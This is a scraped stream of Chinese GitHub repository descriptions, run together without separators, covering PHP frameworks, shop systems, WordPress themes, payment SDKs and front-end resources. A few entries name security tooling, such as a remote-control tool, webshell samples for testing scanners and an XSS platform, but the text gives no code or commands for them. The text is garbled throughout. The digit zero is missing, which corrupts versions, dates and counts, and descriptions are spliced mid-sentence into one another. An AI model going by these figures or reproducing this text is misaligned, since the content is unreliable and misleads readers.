集群版 以及多种proxy 支持同构以及异构对比 redis的版本支持2 x 5 x 使用go micro微服务实现的在线电影院订票系统后端一站式微服务框架 提供API web websocket RPC 任务调度 消息消费服务器红蓝对抗跨平台远控工具Interchain protocol 跨链协议简单易用 足够轻量 性能好的 Golang 库一个go echo vue 开发的快速 简洁 美观 前后端分离的个人博客系统 blog 也可方便二次开发为CMS 内容管理系统 和各种企业门户网站 正在更新权限管理 hauth项目 不是一个前端or后台框架 而是一个集成权限管理 菜单资源管理 域管理 角色管理 用户管理 组织架构管理 操作日志管理等等的快速开发平台. hauth是一个基础产品 在这个基础产品上 根据业务需求 快速的开发应用服务.账号 admin 密码 123456通用的数据验证与过滤库 使用简单 内置大部分常用验证 过滤器 支持自定义验证器 自定义消息 字段翻译 CTF AWD Attack with Defense 线下赛平台 AWD platform 欢迎 Star 蓝鲸智云容器管理平台 BlueKing Container Service 程序员如何优雅的挣零花钱 2 版 升级为小书了 一个 PHP 微信 SDKAV 电影管理系统 avmoo javbus javlibrary 爬虫 线上 AV 影片图书馆 AV 磁力链接数据库ThinkPHP Framework 十年匠心的高性能PHP框架 最全的前端资源汇总仓库 包括前端学习 开发资源 求职面试等 多语言多货币多入口的开源电商 B2C 商城 支持移动端vue app html5 微信小程序微店 微信小程序商城等可能是我用过的最优雅的 Alipay 和 WeChat 的支付 SDK 扩展包了 基于词库的中文转拼音优质解决方案 我用爬虫一天时间“偷了”知乎一百万用户 只为证明PHP是世界上最好的语言 所使用的程序微信 SDK for Laravel 基于 overtrue wechat开源在线教育点播系统 一款满足你的多种发送需求的短信发送组件 基于 Laravel 的后台系统构建工具 Laravel Admin 使用很少的代码快速构建一个功能完善的高颜值后台系统 内置丰富的后台常用组件 开箱即用 让开发者告别冗杂的HTML代码一个想帮你总结所有类型的上传漏洞的靶场优雅的渐进式PHP采集框架 Laravel 电商实战教程的项目代码Payment是php版本的支付聚合第三方sdk 集成了微信支付 支付宝支付 招商一网通支付 提供统一的调用接口 方便快速接入各种支付 查询 退款 转账能力 服务端接入支付功能 方便 快捷 SPF Swoole PHP Framework 世界第一款基于Swoole扩展的PHP框架 开发者是Swoole创始人 A Wonderful WordPress Theme 樱花庄的白猫博客主题图床 此项目已弃用 基于 ThinkPHP 基础开发平台 登录账号密码都是 admin PanDownload网页复刻版一个开源的网址导航网站项目 您可以拿来制作自己的网址导航 使用PHP Swoole实现的网页即时聊天工具 独角数卡 发卡 开源式站长自动化售货解决方案 高效 稳定 快速 卡密商城系统 高效安全的在线卡密商城 ️命令行模式开发框架ShopXO免费开源商城系统 国内领先企业级B2C免费开源电商系统 包含PC h5 微信小程序 支付宝小程序 百度小程序 头条 抖音小程序 QQ小程序 APP 多商户 遵循MIT开源协议发布 基于 ThinkPHP5 1框架研发Wizard是一款开源的文档管理工具 支持Markdown Swagger Table类型的文档 Swoole MySQL Proxy 一个基于 MySQL 协议 Swoole 开发的MySQL数据库连接池 学习资源整合Freenom域名自动续期一个好玩的Web安全 漏洞测试平台一个基于Yii2高级框架的快速开发应用引擎蓝天采集器是一款免费的数据采集发布爬虫软件 采用php mysql开发 可部署在云服务器 几乎能采集所有类型的网页 无缝对接各类CMS建站程序 免登录实时发布数据 全自动无需人工干预 是网页大数据采集软件中完全跨平台的云端爬虫系统免费开源的中文搜索引擎 采用 C C 编写 基于 xapian 和 scws 提供 PHP 的开发接口和丰富文档WDScanner平台目前实现了如下功能 分布式web漏洞扫描 客户管理 漏洞定期扫描 子域名枚举 端口扫描 网站爬虫 暗链检测 坏链检测 网站指纹搜集 专项漏洞检测 代理搜集及部署等功能 ️兰空图床图标工场 移动应用图标生成工具 一键生成所有尺寸的应用图标和启动图 Argon 一个轻盈 简洁的 WordPress 主题Typecho Fans插件作品目录PHP代码审计分段讲解一个结构清晰的 易于维护的 现代的PHP Markdown解析器百度贴吧云签到 在服务器上配置好就无需进行任何操作便可以实现贴吧的全自动签到 配合插件使用还可实现云灌水 点赞 封禁 删帖 审查等功能 注意 Gitee 原Git osc 仓库将不再维护 目前唯一指定的仓库为 Github 本项目没有官方交流群 如需交流可以直接使用Github的Discussions 没有商业版本 目前贴吧云签到由社区共同维护 不会停止更新 PR 通常在一天内处理 微信调试 API调试和AJAX的调试的工具 能将日志通过WebSocket输出到Chrome浏览器的console中 結巴 中文分詞 做最好的 PHP 中文分詞 中文斷詞組件EleTeam开源项目 电商全套解决方案之PHP版 Shop for PHP Yii2 一个类似京东 天猫 淘宝的商城 有对应的APP支持 由EleTeam团队维护 RhaPHP是微信第三方管理平台 微信公众号管理系统 支持多公众号管理 CRM会员管理 小程序开发 APP接口开发 几乎集合微信功能 简洁 快速上手 快速开发微信各种各样应用 简洁 好用 快速 项目开发快几倍 群 656868 一刻社区后端 API 源码 新 微信服务号 微信小程序 微信支付 支付宝支付苹果cms v1 maccms v1 麦克cms 开源cms 内容管理系统 视频分享程序 分集剧情程序 网址导航程序 文章程序 漫画程序 图片程序一个PHP文件搞定支付宝支付系列 包括电脑网站支付 手机网站支付 现金红包 消费红包 扫码支付 JSAPI支付 单笔转账到支付宝账户 交易结算 分账 分润 网页授权获取用户信息等restful api风格接口 APP接口 APP接口权限 oauth2 接口版本管理 接口鉴权基于企业微信的开源SCRM应用开发框架 引擎 也是一套通用的企业私域流量管理系统 API接口大全不断更新中 欢迎Fork和Star 1 一言 古诗句版 api 2 必应每日一图api 3 在线ip查询 4 m3u8视频在线解析api 5 随机生成二次元图片api 6 快递查询api 支持国内百家快递 7 flv视频在线解析api 8 抖音视频无水印解析api 9 一句话随机图片api 1 QQ用户信息获取api 11 哔哩哔哩封面图获取api 12 千图网58pic无水印解析下载api 13 喜马拉雅主播FM数据采集api 14 网易云音乐api 15 CCTV央视网视频解析api 16 微信运动刷步数api 17 皮皮搞笑 基于swoole的定时器程序 支持秒级处理群 656868 ️ Saber PHP异步协程HTTP客户端微信支付单文件版 一个PHP文件搞定微信支付系列 包括原生支付 扫码支付 H5支付 公众号支付 现金红包 企业付款到零钱等 新增V3版 一个还不错的图床工具 支持Mac Win Linux服务器 支持压缩后上传 添加图片或文字水印 多文件同时上传 同时上传到多个云 右击任意文件上传 快捷键上传剪贴板截图 Web版上传 支持作为Mweb Typora发布图片接口 作为PicGo ShareX uPic等的自定义图床 支持在服务器上部署作为图床接口 支持上传任意格式文件 可能是我用过的最优雅的 Alipay 和 WeChat 的 laravel 支付扩展包了上传大文件的Laravel扩展包开发内功修炼Laravel核心代码学习南京邮电大学开源 Online Judge QQ群 6681 8264 免费IP地址数据库 已支持IPV4 IPV6 结构化输出为国家 省 市 县 运营商 中文数据库 方便实用 laravel5 5和vue js结合的前后端分离项目模板 后端使用了laravel的LTS版本 5 5 前端使用了流行的vue element template项目 作为程序的起点 可以直接以此为基础来进行业务扩展 模板内容包括基础的用户管理和权限管理 日志管理 集成第三方登录 整合laravel echo server 实现了websocket 做到了消息的实时推送 并在此基础上 实现了聊天室和客服功能 权限管理包括后端Token认证和前端vue js的动态权限 解决了前后端完整分离的情况下 vue js的认证与权限相关的痛点 已在本人的多个项目中集成使用 Web安全之机器学习入门 网易云音乐升级APIPHP 集成支付 SDK 集成了支付宝 微信支付的支付接口和其它相关接口的操作 支持 php fpm 和 Swoole 所有框架通用 宇润PHP全家桶技术支持群 17916227MDClub 社区系统后端代码imi 是基于 Swoole 的 PHP 协程开发框架 它支持 Http2 WebSocket TCP UDP MQTT 等主流协议的服务开发 特别适合互联网微服务 即时通讯聊天im 物联网等场景 QQ群 17916227WordPress 版 WebStack 导航主题 nav iowen cnLive2D 看板娘插件 www fghrsh net post 123 html 上使用的后端 API简单搜索 一个简单的前端界面 用惯了各种导航首页 满屏幕尽是各种不厌其烦的广告和资讯 尝试自己写个自己的主页 国内各大CTF赛题及writeup整理收集自网络各处的 webshell 样本 用于测试 webshell 扫描器检测率 PHP微信SDK 微信平台 微信支付 码小六 GitHub 代码泄露监控系统PHP表单生成器 快速生成现代化的form表单 支持前后端分离 内置复选框 单选框 输入框 下拉选择框 省市区三级联动 时间选择 日期选择 颜色选择 文件 图片上传等17种常用组件 悟空CRM 基于TP5 vue ElementUI的前后端分离CRM系统V免签PHP版 完全开源免费的个人免签约解决方案Composer 全量镜像发布于2 17年3月 曾不间断运行2年多 这个开源有助于理解 Composer 镜像的工作原理一个多彩 轻松上手 体验完善 具有强大自定义功能的WordPress主题 基于Sakura主题全球免费代理IP库 高可用IP 精心筛选优质IP 2s必达LaraCMS 是在学习 laravel web 开发实战进阶 实战构架 API 服务器 过程中产生的一个业余作品 试图通过简单的方式 快速构建一套基本的企业站同时保留很灵活的扩展能力和优雅的代码方式 当然这些都得益Laravel的优秀设计 同时LaraCMS 也是一个学习Laravel 不错的参考示例 已停止维护 HookPHP基于C扩展搭建内置AI编程的架构系统 支持微服务部署 热插拔业务组件 集成业务模型 权限模型 UI组件库 多模板 多平台 多域名 多终端 多语言 含常驻内存 前后分离 API平台 LUA QQ群 67911638 中华人民共和国居民身份证 中华人民共和国港澳居民居住证以及中华人民共和国台湾居民居住证号码验证工具 PHP 版 最简单的91porn爬虫php版本Fend 是一款短小精悍 可在 FPM Swoole 服务容器平滑切换的高性能PHP框架 no evil 实现过滤敏感词汇 基于确定有穷自动机 DFA 算法 支持composer安装扩展Z BlogPHP博客程序IYUU自动辅种工具 目前能对国内大部分的PT站点自动辅种 支持下载器集群 支持多盘位 支持多下载目录 支持远程连接等 果酱小店 基于 Laravel swoole 小程序的开源电商系统 优雅与性能兼顾 這是一份純靠北工程師的專案 請好好愛護它 謝謝 EC ecjia 到家是一款可开展O2O业务的移动电商系统 它包含 移动端APP 采用原生模式开发 覆盖使用iOS 及Android系统的移 动终端 后台系统 针对平台日常运营维护的平台后台 针对入驻店铺管理的商家后台 独立并行 移动端H5 能够灵活部署于微信及其他APP 网页等 Material Design 指南的中文翻译 一个纯php分词 thinkphp5 1 layui 实现的带rbac的基础管理后台 方便快速开发法使用百度pcs上传脚本目前最全的前端开发面试题及答案樱花内网穿透网站源代码 2 2 重制版MeepoPS是Meepo PHP Socket的缩写 旨在提供稳定的Socket服务 可以轻松构建在线实时聊天 即时游戏 视频流媒体播放等 基础目录 聚合所有其他目录 包含文档和例子基于 Vue js 的简洁一般强大的 WordPress 单栏博客主题阿里云打造Laravel最好的OSS Storage扩展 网上在线商城 综合网上购物平台swoolefy是一个基于swoole实现的轻量级 高性能 协程级 开放性的API应用服务框架基于redis实现高可用 易拓展 接入方便 生产环境稳定运行的延迟队列 一款基于WordPress开发的高颜值的自适应主题 支持白天与黑夜模式 无刷新加载等 阿里云 OSS 官方 SDK 的 Composer 封装 支持任何 PHP 项目 包括 Laravel Symfony TinyLara 等等 此插件将你的WordPress接入本土生态体系之中 使之更适合国内应用环境PHP的服务化框架 适用于Api Server Rpc Server 帮助原生PHP项目转向微服务化 出色的性能与支持高并发的协程相结合基于ThinkPHP V6 开发的面向API的后台管理系统 PHP Swoole 开发的在线同步点歌台 支持自由点歌 切歌 调整排序 删除指定音乐以及基础权限分级信呼 免费开源的办公OA系统 包括APP pc上客户端 REIM即时通信 服务端等 让每个企业单位都有自己的办公系统 来客电商 微信小程序商城 APP商城 公众号商城 PC商城系统 支付宝小程序商城 抖音小程序商城 百度小程序电商系统 前后端代码全部开源 注重界面美感与用户体验 打造独特电商系统生态圈哔哩哔哩 Bilibili B 站主站助手 直播助手 直播抽奖 挂机升级 贴心小棉袄脚本 Lv6 离你仅有一步之遥 PHP 版 Personal 一个运用php与swoole实现的统计监控系统短视频去水印 抖音 皮皮虾 火山 微视 微博 绿洲 最右 轻视频 快手 全民小视频 巴塞电影 陌陌 Before避风 开眼 Vue Vlog 小咖秀 皮皮搞笑 全民K歌 西瓜视频 中国农历 阴历 与阳历 公历 转换与查询工具AoiAWD 专为比赛设计 便携性好 低权限运行的EDR系统 项目管理系统后端接口ThinkPHP 队列支持Typecho Theme Aria 书写自己的篇章PHP 中文工具包 支持汉字转拼音 拼音分词 简繁互转 数字 金额大写 QQ群 17916227Yii2 community 请访问淘客5合一SDK 支持淘宝联盟 京东联盟 多多进宝 唯品会 苏宁基于 thinkphp 开发的的 blogMojito Admin 基于 Laravel Vue Element 构建的后台管理系统一个经典的XSS渗透管理平台一款基于 RageFrame2 的免费开源的基础销售功能的商城基于Laravel 5 4 的开发的博客系统 代号 myPersimmon证件照片排版在线生成器 在一张6寸的照片上排版多张证件照清华大学计算机学科推荐学术会议和期刊列表WordPress响应式免费主题 Art Blog唯品秀博客 weipxiu com 备用域名weipxiu cn 开源给小伙伴免费使用 如使用过程有任何问题 在线技术支持QQ 欢迎打扰 原创不易 如喜欢 请多多打赏 演示 EwoMail是基于Linux的企业邮箱服务器 集成了众多优秀稳定的组件 是一个快速部署 简单高效 多语言 安全稳定的邮件解决方案 笔记本新版简单强大的无数据库的图床2 版 演示地址 Bilibili B 站自动领瓜子 直播助手 直播挂机脚本 主站助手 PHP 版微信群二维码活码工具 生成微信群活码 随时可以切换二维码 短视频的PHP拓展包 集成各大短视频的去水印功能 抖音 快手 微视主流短视频 PHP去水印一个PHPer的升级之路酷瓜云课堂 在线教育 网课系统 网校系统 知识付费系统 不加密不阉割 1 %全功能开源 可免费商用 框架主要使用ThinkPHP6 layui 拥有完善的权限的管理模块以及敏捷的开发方式 让你开发起来更加的舒服 laravel5 5搭建的后台管理 和 api服务 的小程序商城基于ThinkPHP5 AdminLTE的后台管理系统魔改版本 为 OLAINDEX 添加多网盘挂载及一些小修复海豚PHP 基于ThinkPHP5 1 41LTS的快速开发框架挂载Teambition文件 可直链分享 支持网盘 需申请 和项目文件 无需邀请码 准确率99 9%的ip地址定位库laravel ant design vue 权限后台PHP 第三方登录授权 SDK 集成了QQ 微信 微博 Github等常用接口 支持 php fpm 和 Swoole 所有框架通用 QQ群 17916227抖音去水印PHP版接口一个分布式统计监控系统 包含PHP客户端 服务端整合多接口的IP查询工具 基于阿里云OSS的WordPress远程附件支持插件 后会有期 开箱即用的Laravel后台扩展 前后端分离 后端控制前端组件 无需编写vue即可创建一个的项目 丰富的表单 表格组件 强大的自定义组件功能 yii2 swoole 让yii2运行在swoole上胖鼠采集 WordPress优秀开源采集插件CatchAdmin是一款基于thinkphp6 和 element admin 开发的后台管理系统 基于 ServiceProvider 系统模块完全接耦 随时卸载安装模块 提供了完整的权限和数据权限等功能 大量内置的开发工具提升你的开发体验 官网地址 微信公众平台php版开发包微信小程序 校园小情书后台源码 好玩的表白墙 告白墙 功能全面的PHP命令行应用库 提供控制台参数解析 命令运行 颜色风格输出 用户信息交互 特殊格式信息显示基于 chinese poetry 数据整理的一份 mysql 格式数据帮助 thinkphp 5 开发者快速 轻松的构建Api hyperf admin 是基于 hyperf vue 的配置化后台开发工具 微信支付php 写的视频下载工具 现已支持 Youku Miaopai 腾讯 XVideos Pornhub 91porn 微博酷燃 bilibili 今日头条 芒果TVCorePress 主题 一款高性能 高颜值的WordPress主题快链电商 直播电商 分销商城 微信小程序商城 APP商城 公众号商城 PC商城系统 支付宝小程序商城 抖音小程序商城 百度小程序电商系统 前后端代码全部开源 Laravel vue开发 成熟商用项目 shop mall 商城 电商 利用 PHP cURL 转发 Disqus API 请求可能是最优雅 简易的淘宝客SDKUniAdmin是一套渐进式模块化开源后台 采用前后端分离技术 数据交互采用json格式 功能低耦合高内聚 核心模块支持系统设置 权限管理 用户管理 菜单管理 API管理等功能 后期上线模块商城将打造类似composer npm的开放式插件市场 同时我们将打造一套兼容性的API标准 从ThinkPHP5 1 Vue2开始 逐步吸引爱好者共同加入 以覆盖等多语言框架 PHP 多接口获取快递物流信息包LightCMS 是一个基于 Laravel 开发的轻量级 CMS 系统 也可以作为一个通用的后台管理框架使用单点登录系统快乐二级域名分发系统Typecho Theme Story 爱上你我的故事 一个轻量化的留言板 记事本 社交系统 博客 人类的本质是 咕咕咕?微信域名拦截检测 QQ域名拦截检测 t xzkxb com 查询有缓存 如需实时查询请自行部署 高性能分布式并发锁 行为限流Emlog是一款基于PHP和MySQL的功能强大的博客及CMS建站系统 追求快速 稳定 简单 舒适的建站体验Hyperf admin 基于Hyperf Element UI 通用管理后台企业仓库管理系统HisiPHP V2版是基于ThinkPHP5 1和Layui开发的后台框架 承诺永久免费开源 您可用于学习和商用 但须保留版权信息正常显示 如果HisiPHP对您有帮助 您可以点击右上角 Star 支持一下哦 谢谢 使用PHP开发的简约导航 书签管理系统 软擎是基于 Php 7 2 和 Swoole 4 4 的高性能 简单易用的开发框架 支持同时在 Swoole Server 和 php fpm 两种模式下运行 内置了服务 集成了大量成熟的组件 可以用于构建高性能的Web系统 API 中间件 基础服务等等 个人发卡源码 发卡系统 二次元发卡系统 二次元发卡源码 发卡程序 动漫发卡 PHP发卡源码聊天应用 php实现的dht爬虫搭建的webim客服系统 即时通讯一些实用的python脚本同城拼车微信小程序后端代码 一个响应式干净和简洁优雅的 Typecho 主题php仓库进销存深度学习5 问 以问答形式对常用的概率知识 线性代数 机器学习 深度学习 计算机视觉等热点问题进行阐述 以帮助自己及有需要的读者 全书分为18个章节 5 余万字 由于水平有限 书中不妥之处恳请广大读者批评指正 未完待续 如有意合作 联系scutjy2 15 163 com 版权所有 违权必究 Tan 2 18 6题解 记录自己的leetcode解题之路 最全中华古诗词数据库 唐宋两朝近一万四千古诗人 接近5 5万首唐诗加26万宋诗 两宋时期1564位词人 21 5 首词 uni app 是使用 Vue 语法开发小程序 H5 App的统一框架采用自身模块规范编写的前端 UI 框架 遵循原生 HTML CSS JS 的书写形式 极低门槛 拿来即用 我是依扬 木易杨 公众号 高级前端进阶 作者 每天搞定一道前端大厂面试题 祝大家天天进步 一年后会看到不一样的自己 YApi 是一个可本地部署的 打通前后端及QA的 可视化的接口管理平台小程序组件化开发框架网易云音乐 Node js API service基于 Vue js 的小程序开发框架 从底层支持 Vue js 语法和构建工具体系 ECMAScript 6入门 是一本开源的 JavaScript 语言教程 全面介绍 ECMAScript 6 新增的语法特性 谷粒 Chrome插件英雄榜 为优秀的Chrome插件写一本中文说明书 让Chrome插件英雄们造福人类公众号 加1 同步更新前端面试每日 3 1 以面试题来驱动学习 提倡每日学习与思考 每天进步一点 每天早上5点纯手工发布面试题 死磕自己 愉悦大家 4 道前端面试题全面覆盖小程序 软技能 本文原文由知名 Hacker Eric S Raymond 所撰寫 教你如何正確的提出技術問題並獲得你滿意的答案 千古前端图文教程 超详细的前端入门到进阶学习笔记 从零开始学前端 做一名精致优雅的前端工程师 公众号 千古壹号 作者 book Node js 包教不包会 by alsotang收集所有区块链 BlockChain 技术开发相关资料 包括Fabric和Ethereum开发资料轻量 可靠的小程序 UI 组件库微信小程序商城 微信小程序微店一个可以观看国内主流视频平台所有视频的客户端可伸缩布局方案基于 node js Mongodb 构建的后台系统 js 源码解析磁力链接聚合搜索中华人民共和国行政区划 省级 省份直辖市自治区 地级 城市 县级 区县 乡级 乡镇街道 村级 村委会居委会 中国省市区镇村二级三级四级五级联动地址数据 Web接口管理工具 开源免费 接口自动化 MOCK数据自动生成 自动化测试 企业级管理 阿里妈妈MUX团队出品 阿里巴巴都在用 1 公司的选择 RAP2已发布请移步至github com thx rap2 delosKuboard 是基于 Kubernetes 的微服务管理界面 同时提供 Kubernetes 免费中文教程 入门教程 最新版本的 Kubernetes v1 2 安装手册 k8s install 在线答疑 持续更新 ApacheCN 数据结构与算法译文集 chick 是使用 Node js 和 MongoDB 开发的社区系统一个非常适合IT团队的在线API文档 技术文档工具 Chinese sticker pack More joy 表情包的博物馆 Github最有毒的仓库 中国表情包大集合 聚欢乐 高颜值的第三方网易云播放器 支持 Windows macOS Linux vue2 vue router vuex 入门项目网易云音乐第三方 Flutter实战 电子书 一套代码运行多端 一端所见即多端所见 计算机速成课 Crash Course 字幕组 全4 集 2 18 5 1 精校完成 一个 react redux 的完整项目 和 个人总结中文独立博客列表CSS Inspiration 在这里找到写 CSS 的灵感 rich text 富文本编辑器 汉字拼音 hàn zì pīn yīn Chrome插件开发全攻略 配套完整Demo 欢迎clone体验微信调试 各种WebView样式调试 手机浏览器的页面真机调试 便捷的远程调试手机页面 抓包工具 支持 HTTPS 无需USB连接设备 master分支 渲染器 微信小程序组件 API 云开发示例简悦 SimpRead 让你瞬间进入沉浸式阅读的扩展让H5制作像搭积木一样简单 轻松搭建H5页面 H5网站 PC端网站 LowCode平台 一套组件化 可复用 易扩展的微信小程序 UI 组件库这是一个数据可视化项目 能够将历史数据排名转化为动态柱状图图表微信小程序图表charts组件 Charts for WeChat small app类似易企秀的H5制作 建站工具 可视化搭建系统 一个在你编程时疯狂称赞你的 VSCode 扩展插件全家桶后台管理框架解锁网易云音乐客户端变灰歌曲美观易用的React富文本编辑器 基于draft js开发一个致力于微信小程序和 Web 端同构的解决方案從零開始學 ReactJS ReactJS 1 1 是一本希望讓初學者一看就懂的 React 中文入門教學書 由淺入深學習 ReactJS 生態系源码解读 系列文章 完 我就是来分享脚本玩玩的开发者边车 github打不开 github加速 git clone加速 git release下载加速 stackoverflow加速vue源码逐行注释分析 4 多m的vue源码程序流程图思维导图 diff部分待后续更新 微信小程序解决方案 1KB javascript 覆盖状态管理 跨页通讯 插件开发和云数据库开发给老司机用的一个番号推荐系统 FeHelper Web前端助手记录成长的过程哔哩哔哩 bilibili com 辅助工具 可以替换播放器 推送通知并进行一些快捷操作提供了百度坐标 BD 9 国测局坐标 火星坐标 GCJ 2 和WGS84坐标系之间的转换F2etest是一个面向前端 测试 产品等岗位的多浏览器兼容性测试整体解决方案 ️ 阿里飞猪 很易用的中后台 表单 表格 图表 解决方案CRMEB Min 前后端分离版自带客服系统 是CRMEB品牌全新推出的一款轻量级 高性能 前后端分离的开源电商系统 完善的后台权限管理 会员管理 订单管理 产品管理 客服管理 CMS管理 多端管理 页面DIY 数据统计 系统配置 组合数据管理 日志管理 数据库管理 一键开通短信 产品采集 物流查询等接口 React技术揭秘 一本自顶向下的React源码分析书微信小程序 基于wepy 商城 微店 微信小程序 欢迎学习交流大屏数据可视化Pytorch 中文文档经典的网页对话框组件 强大的动态表单生成器 简洁 易用 灵活的微信小程序组件库 一款 Material Design 风格的 Hexo 主题签到一个帮助你自动申请京东价格保护的chrome拓展后台admin前端模板 基于 layui 编写的最简洁 易用的后台框架模板 只需提供一个接口就直接初始化整个框架 无需复杂操作 小程序生成图片库 轻松通过 json 方式绘制一张可以发到朋友圈的图片安卓应用层抓包通杀脚本一个轻量的工具集合婚礼大屏互动 微信请柬一站式解决方案mili 是一个开源的社区系统 界面优雅 功能丰富 丝般顺滑的触摸运动方案做最好的接口管理平台Mpx 一款具有优秀开发体验和深度性能优化的增强型跨端小程序框架省市区县乡镇三级或四级城市数据 带拼音标注 坐标 行政区域边界范围 2 21年 7月 3日最新采集 提供csv格式文件 支持在线转成多级联动js代码 通用json格式 提供软件转成shp geojson sql 导入数据库 带浏览器里面运行的js采集源码 综合了中华人民共和国民政部 国家统计局 高德地图 腾讯地图行政区划数据在vscode中用于生成文件头部注释和函数注释的插件 经过多版迭代后 插件 支持所有主流语言 功能强大 灵活方便 文档齐全 食用简单 觉得插件不错的话 点击右上角给个Star ️呀 JAVClub 让你的大姐姐不再走丢️你想要的最全 Android 进阶路线知识图谱 干货资料收集 开发者推荐阅读的书籍 2 2 淘宝 京东 支付宝双十一 双11全民养猫 全民营业自动化脚本 全额奖励 防检测 一款高性能敏感词 非法词 脏字 检测过滤组件 附带繁体简体互换 支持全角半角互换 汉字转拼音 模糊搜索等功能 前端博客 关注基础知识和性能优化 vue cli4配置vue config js持续更新PT 助手 Plus 为 Google Chrome 和 Firefox 浏览器插件 Web Extensions 主要用于辅助下载 PT 站的种子 基于vue2 koa2的 H5制作工具 让不会写代码的人也能轻松快速上手制作H5页面 类似易企秀 百度H5等H5制作 建站工具最全最新中国省 市 地区json及sql数据首个 Taro 多端统一实例 网易严选 小程序 H5 React Native By 趣店 FED地理信息可视化库企业级 Node js 应用性能监控与线上故障定位解决方案 Node js区块链开发 注 新版代码已开源 请star支持哦 基于Auto js的蚂蚁森林能量自动收取脚本 结巴 中文分词的Node js版本 译 面向机器学习的特征工程webfunny是一款轻量级的前端监控系统 webfunny也是一款前端性能监控系统 无埋点监控前端日志 实时分析前端健康状态一个实现汉字与拼音互转的小巧web工具库 演示地址 前端进阶 优质博文 一个 Chrome 插件 将 Google CDN 替换为国内的 Vue ElementUI构建的CMS开发框架超完整的React Native项目 功能丰富 适合学习和日常使用 GSYGithubApp系列的优势 我们目前已经拥有四个版本 功能齐全 项目框架内技术涉及面广 完成度高 配套文章 适合全面学习 对比参考 开源Github客户端App 更好的体验 更丰富的功能 旨在更好的日常管理和维护个人Github 提供更好更方便的驾车体验Σ 同款Weex版本同款Flutter版本 https github com CarGu 群 宇宙最强的前端面试指南 lucifer ren fe interview 微慕小程序开源版 WordPress版微信小程序函数式编程指北中文版Node js面试题 侧重后端应用与对Node核心的理解jQuery源码解析小白入坑vue三部曲 关于 vue 在工作的使用问题总结 请看博客 sunseekers github io 一直保持更新基于 Vue 的 PWA 解决方案 帮助开发者快速搭建 PWA 应用 解决接入 PWA 的各种问题ThinkCMF是一款支持Swoole的开源内容管理框架 基于ThinkPHP开发 同时支持PHP FPM和Swoole双模式 让WEB开发更快 微信小程序图片裁剪工具前端知识月刊Next Terminal是一个轻量级堡垒机系统 易安装 易使用 支持RDP SSH VNC Telnet Kubernetes协议 微信小程序 日历组件 基于 ueditor的更现代化的富文本编辑器 支持HTTPS基于JavaScript React Vue2的流程图组件 采用Spring MyBatis Shiro框架 开发的一套权限系统 极低门槛 拿来即用 设计之初 就非常注重安全性 为企业系统保驾护航 让一切都变得如此简单 QQ群 32478 2 4 145799952 一个前端的博客 春松客服 多渠道智能客服系统 开源客服系统 机器人客服一个工作流平台小程序 小游戏以及 Web 通用 Canvas 渲染引擎 在线工具秘籍 为在线工具写一本优质说明书 让在线工具造福人类 前端内参 有关于JavaScript 编程范式 设计模式 软件开发的艺术等大前端范畴内的知识分享 旨在帮助前端工程师们夯实技术基础以通过一线互联网企业技术面试 ️ vCards 中国黄页 优化 iOS Android 来电 信息界面体验各平台的分流规则 复写规则及自动化脚本 基于vue2 的实时聊天项目 图片剪裁上传组件 等笔记快速分享 GoogleDrive OneDrive 每日时报 以前端技术体系为主要分享课题 根据 文章 工具 新闻 视频几大板块作为主要分类 一款高效 高性能的帧动画生成工具 停止维护 一个在线音乐播放器 仅 UI 无功能 小程序富文本组件 支持渲染和编辑 html 支持在微信 QQ 百度 支付宝 头条和 uni app 平台使用基于 electron vue 开发的音乐播放器 界面模仿QQ音乐 技术栈欢迎starweui 是在weui和zepto基础上开发的增强UI组件 目前分为表单 基础 组件 js插件四大类 共计百余项功能 是最全的weui样式同步和更新大佬脚本库 更新懒人配置腾讯云即时通信 IM 服务 国内下载镜像 基于 Vue 的小程序开发框架React 16 8打造精美音乐WebAppWK系列开发框架 V1至V5 Java开源企业级开发框架 单应用 微服务 分布式 ️中国 省市区 三级联动 地址选择器 微信小程序2d动画库 分布式 Redis缓存 Shiro权限管理 Spring Session单点登录 Quartz分布式集群调度 Restful服务 QQ 微信登录 App token登录 微信 支付宝支付 日期转换 数据类型转换 序列化 汉字转拼音 身份证号码验证 数字转人民币 发送短信 发送邮件 加密解密 图片处理 excel导入导出 FTP SFTP fastDFS上传下载 二维码 XML读写 高精度计算 系统配置工具类等等 EduSoho 网络课堂是由杭州阔知网络科技有限公司研发的开源网校系统 EduSoho 包含了在线教学 招生和管理等完整功能 让教育机构可以零门槛建立网校 成功转型在线教育 EduSoho 也可作为企业内训平台 帮助企业实现人才培养 自用的一些乱七八糟 油猴脚本 为刚刚学习php语言以及web网站开发整理的一套资源 有视频 实战代码 学习路径等 会持续更新 This is a goindex theme 一个goindex的扩展主题 NumPy官方中文文档 完整版 搭建移动端开发 基于适配方案 axios封装 构建手机端模板脚手架 后台管理 脚手架接口 从简单开始 PhalApi简称π框架 一个轻量级PHP开源接口框架 专注于接口服务开发 前端特效存档Chrome浏览器 抢购 秒杀插件 秒杀助手 定时自动点击云存储管理客户端 支持七牛云 腾讯云 青云 阿里云 又拍云 亚马逊S3 京东云 仿文件夹管理 图片预览 拖拽上传 文件夹上传 同步 批量导出URL等功能font carrier是一个功能强大的字体操作库 使用它你可以随心所欲的操作字体 让你可以在svg的维度改造字体的展现形状 CRN是Ctrip React Native简称 由携程无线平台研发团队基于React Native框架优化 定制成稳定性和性能更佳 也更适合业务场景的跨平台开发框架 油猴脚本页面浮窗广告完全过滤净化 国服最强最全最新CSDN脚本微信小程序即时通讯模板 使用WebSocket通信小程序反编译 支持分包 “想学吗”个人知识管理与自媒体营销工具 超多经典 Canvas 实例 动态离子背景 炫彩小球 贪吃蛇 坦克大战 是男人就下1 层 心形文字等 Vue UEditor v model双向绑定 HQChart H5 微信小程序 沪深 港股 数字货币 期货 美股 K线图 kline 走势图 缩放 拖拽 十字光标 画图工具 截图 筹码图 分析家语法 通达信语法 麦语法 第3方数据替换接口基于koa2的标准前后端分离框架 一款企业信息化开发基础平台 拟集成OA 办公自动化 CMS 内容管理系统 等企业系统的通用业务功能 JeePlatform项目是一款以SpringBoot为核心框架 集ORM框架Mybatis Web层框架SpringMVC和多种开源组件框架而成的一款通用基础平台 代码已经捐赠给开源中国社区基于inception的自动化SQL操作平台 支持SQL执行 LDAP认证 发邮件 OSC SQL查询 SQL优化建议 权限管理等功能 支持docker镜像是一款专门面向个人 团队和小型组织的私有网盘系统 轻量 开源 完善 无论是在家庭 学校还是在办公室 您都能立刻开始使用它 了解更多请访问官方网站 Node js API 中文文档dubbo服务管理以及监控系统拯救B站的弹幕体验 对抗假消息系列项目之一 截屏 实锤?相信你就输了 ”突破性“更新 支持修改任何网站 ️一个简洁 优雅且高效的 Hugo 